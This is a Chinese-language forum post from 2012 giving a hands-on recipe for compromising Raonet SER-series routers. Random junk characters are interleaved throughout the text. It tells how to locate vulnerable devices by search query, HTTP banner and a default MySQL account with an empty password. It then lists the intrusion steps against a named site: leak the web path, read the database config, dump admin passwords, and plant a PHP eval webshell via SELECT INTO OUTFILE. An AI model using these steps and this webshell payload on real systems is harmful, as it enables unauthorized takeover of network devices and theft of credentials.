寻找存在漏洞的路由器方法:
+ w! N9 s) M4 c% k5 @# U( Z) p. }8 X
1:google搜索'Raonet Subscriber Ethernet Router'8 ]6 }: Y- e1 m2 p( G A( t9 \
* J8 s- |4 _: @
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
% V7 q/ i. @! v' `* g- R! m' ^! j$ @7 _, k! R1 ^% }
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
I0 R: o: F- M7 O! T
) J5 Y2 v- I8 m8 I//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成....... l* C7 L# ^. m5 T1 G3 l/ M- L8 V3 b
. \+ p" i* Q! T/ m
& O- o& J. D8 ^ J
1 d7 B4 k% x- K% M+ E- Q7 X7 \5 @
入侵步骤:; `1 S C" F$ M9 K" f" m1 H& j
& ]4 O; J* G' a5 h2 g" m1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php7 Y% |& k6 U8 k0 C0 w
" Z- `% `" ]+ p1 W/ o. U: a
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc: `# g6 V; p' h' g1 q$ W. Q
3:得到密码后连接,查看GUI管理密码:
0 n. Q" l8 {/ E. r6 r1 Duse ser_500) I* ?7 ^3 O* l) S X! e
select id,passwd from user;9 X7 a5 m9 a3 }6 P4 I
4:通过数据库写入webshell,执行命令:
! G* C5 a0 r+ {0 puse mysql;' f, E9 T3 B! p& t) O1 ]
create table ok(cmd TEXT);
& L9 @& R7 p' o/ binsert into ok values("<?php @eval($_POST[cmd])?>");
6 Y* H4 ~ w' j; n3 A3 k( J7 wselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
! y/ T8 g8 j. }8 X D: A' ]% @drop table ok;
4 W/ v/ t. O1 A a$ Y. D Z8 c O3 O; q! d. A" `- _8 A7 u
5:连接后门shell.php 1 p0 B" ]) o! s. e
+ J: g! b/ P0 q! A" }/ L6. 搞定!8 @7 n/ p0 O( U4 k' @9 m M0 ?
7 W+ U. X+ C9 W! v0 |- U
|
发表于 2012-12-10 10:30:18
收藏
分享
支持
反对
发表于 2013-7-27 20:06:50